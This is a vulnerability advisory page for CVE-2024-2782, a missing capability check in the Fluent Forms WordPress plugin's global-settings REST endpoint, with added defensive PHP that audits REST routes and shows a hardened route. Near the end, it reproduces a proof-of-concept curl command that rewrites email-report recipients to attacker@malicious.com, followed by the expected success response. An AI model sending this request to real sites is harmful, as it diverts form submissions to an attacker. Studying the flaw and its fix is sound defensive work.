Contact Form – Fluent Forms Unauthorized Data Modification Vulnerability

Vulnerability Information

Vulnerability name: Contact Form – Fluent Forms Unauthorized Data Modification Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-2782

Vulnerability type: Unauthorized access

Severity: High

Description: Contact Form – Fluent Forms is a form-builder plugin for WordPress that supports contact forms, quizzes and surveys, and drag-and-drop form building; it is widely deployed on WordPress sites of all kinds. In all versions up to and including 5.1.16, the plugin contains an unauthorized-access vulnerability: an attacker can modify every plugin setting through the /wp-json/fluentform/v1/global-settings REST API endpoint without any authentication.

The technical root cause is missing access control on the /wp-json/fluentform/v1/global-settings REST API endpoint: requests are not subjected to a capability check, so an unauthenticated attacker can send a crafted request that modifies plugin settings. Because of this design flaw, a single HTTP POST with no user interaction and no authentication is enough to change the plugin's settings without authorization.

The impact is severe. An attacker can change the plugin's email settings so that form-submission data is redirected to an attacker-controlled mailbox, leaking sensitive information. By altering other key settings, an attacker may also disrupt normal site functionality or chain into other vulnerabilities. Because exploitation requires no authentication and can be automated, every WordPress site running an affected version of the plugin is at high risk.
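A site owner who wants to know which REST routes on their own installation accept write requests without a real permission check can enumerate them from inside WordPress. The following is an added example written for this page; it is not part of the advisory or of the Fluent Forms plugin. It uses the public WP_REST_Server::get_routes() API, is intended to be run with WP-CLI's `wp eval-file`, and the function name and file name are assumptions.

```php
<?php
/**
 * Added example (not from the advisory or the Fluent Forms project):
 * list REST routes that accept write methods while having no
 * permission_callback at all, or one that is the stock '__return_true'.
 * Usage (file name is an assumption): wp eval-file rest-audit.php
 */
function example_audit_writable_rest_routes( $namespace = '' ) {
    $write_methods = array( 'POST', 'PUT', 'PATCH', 'DELETE' );
    $findings      = array();

    // rest_get_server() fires rest_api_init on first use, so every plugin's
    // routes are registered before we read them back.
    $routes = rest_get_server()->get_routes( $namespace );

    foreach ( $routes as $route => $handlers ) {
        foreach ( $handlers as $handler ) {
            // register_rest_route() normalises 'methods' to [ 'POST' => true, ... ].
            $methods = array_keys( array_filter( (array) ( $handler['methods'] ?? array() ) ) );
            $writes  = array_values( array_intersect( $methods, $write_methods ) );
            if ( empty( $writes ) ) {
                continue; // read-only route: public access may be intended
            }

            $perm = $handler['permission_callback'] ?? null;
            if ( null === $perm ) {
                $reason = 'no permission_callback';
            } elseif ( '__return_true' === $perm ) {
                $reason = 'permission_callback is __return_true';
            } else {
                continue; // some callback exists; inspect it by hand if needed
            }

            $findings[] = array(
                'route'   => $route,
                'methods' => $writes,
                'reason'  => $reason,
            );
        }
    }

    return $findings;
}

// Print one line per finding so the output can be diffed between runs.
foreach ( example_audit_writable_rest_routes() as $finding ) {
    printf(
        "%-60s %-18s %s\n",
        $finding['route'],
        implode( ',', $finding['methods'] ),
        $finding['reason']
    );
}
```

Findings still need triage: a public form-submission endpoint is expected to accept unauthenticated POSTs, whereas a route that writes global plugin settings is not. Routes whose permission_callback is a closure are skipped by this script, so a closure that merely returns true would not be reported.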

Vendor: Fluent Forms

Product name: Contact Form – Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder

Affected versions: version <= 5.1.16

Source: https://github.com/whale93/CVE-2024-2782-PoC

Type: CVE-2024: github search

Repository files

  • README.md

Source overview

CVE-2024-2782-PoC

CVE-2024-2782 Proof-of-Concept

The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp-json/fluentform/v1/global-settings REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to modify all of the plugin’s settings.
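The defect described here (and in the description above) is a REST route whose permission_callback does not enforce a capability, so the server accepts writes from anonymous callers. The following is an added example of how a settings-write route of this kind should be registered; it was written for this page and is not Fluent Forms' code. The namespace example-plugin/v1, the option name example_plugin_global_settings and the function names are assumptions, and the request shape is modelled loosely on the key / email_report fields visible in the PoC below.

```php
<?php
// Added example, not the plugin's own code. Namespace, option name and
// function names are hypothetical.
add_action( 'rest_api_init', function () {
    // Weak pattern: '__return_true' lets any unauthenticated request through.
    // This is the class of defect the advisory describes (missing capability
    // check); it is shown only as the "before" of the hardened route.
    register_rest_route( 'example-plugin/v1', '/global-settings-weak', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_plugin_save_settings',
        'permission_callback' => '__return_true',
    ) );

    // Hardened pattern: require a user who may manage site options, and
    // declare an argument schema so only known keys reach the database.
    register_rest_route( 'example-plugin/v1', '/global-settings', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_plugin_save_settings',
        'permission_callback' => function () {
            if ( ! current_user_can( 'manage_options' ) ) {
                // 401 for anonymous callers, 403 for logged-in users without the capability.
                return new WP_Error(
                    'rest_forbidden',
                    __( 'You are not allowed to change these settings.', 'example-plugin' ),
                    array( 'status' => rest_authorization_required_code() )
                );
            }
            return true;
        },
        'args' => array(
            'key' => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array( 'emailSummarySettings' ),
            ),
            'email_report' => array(
                'required'   => true,
                'type'       => 'object',
                'properties' => array(
                    'send_to_type'      => array( 'type' => 'string', 'enum' => array( 'admin', 'custom' ) ),
                    'custom_recipients' => array( 'type' => 'string' ),
                ),
            ),
        ),
    ) );
} );

// Shared handler: by the time it runs, the hardened route has already
// enforced the capability and validated the body against the schema.
function example_plugin_save_settings( WP_REST_Request $request ) {
    $key    = sanitize_key( $request->get_param( 'key' ) );
    $report = (array) $request->get_param( 'email_report' );

    // Keep only syntactically valid addresses in the recipient list.
    $recipients = array_filter( array_map(
        'sanitize_email',
        explode( ',', (string) ( $report['custom_recipients'] ?? '' ) )
    ) );

    $clean = array(
        'send_to_type'      => sanitize_text_field( $report['send_to_type'] ?? 'admin' ),
        'custom_recipients' => implode( ',', $recipients ),
    );

    $settings         = get_option( 'example_plugin_global_settings', array() );
    $settings[ $key ] = $clean;
    update_option( 'example_plugin_global_settings', $settings );

    return rest_ensure_response( true );
}
```

With cookie authentication, WordPress only recognises the logged-in user when the request carries a valid X-WP-Nonce header; without it current_user_can() sees an anonymous user and the hardened route answers 401. The weak route answers true to anyone, which is exactly the behaviour the unpatched endpoint shows in the response below.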

Prerequisites

  • WordPress site with Contact Form – Fluent Forms ≤ 5.1.16 active.
  • Attacker can reach the site’s REST API (no authentication needed).

Exploit Command

curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings" \
  -H "Content-Type: application/json" \
  -d '{
    "key": "emailSummarySettings",
    "email_report": "{"send_to_type":"custom","custom_recipients":"attacker@malicious.com"}"
  }'

Expected Response

HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true

Screenshot: [image]

Verify changes in WordPress database: [image]


http://example.com/2025/08/03/github_3994850276/
Author
lianccc
Published
August 3, 2025
License